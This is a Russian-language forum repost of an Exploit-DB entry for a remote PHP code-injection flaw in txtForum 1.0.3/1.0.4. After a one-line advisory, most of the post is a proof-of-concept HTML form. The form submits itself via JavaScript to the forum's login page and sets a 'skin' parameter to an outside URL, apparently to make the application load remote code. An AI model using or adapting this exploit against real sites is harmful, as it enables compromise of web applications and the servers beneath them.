Exploit txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27408
Проверка EDB
  1. Пройдено
Автор
ENJI@INFOSYS.TUWIEN.AC.AT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-03-09
Код:
source: https://www.securityfocus.com/bid/17061/info

txtForum is prone to a remote PHP code-injection vulnerability. 

An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.

<form action='http://www.example.com/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://www.example.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
 
Источник
www.exploit-db.com

Похожие темы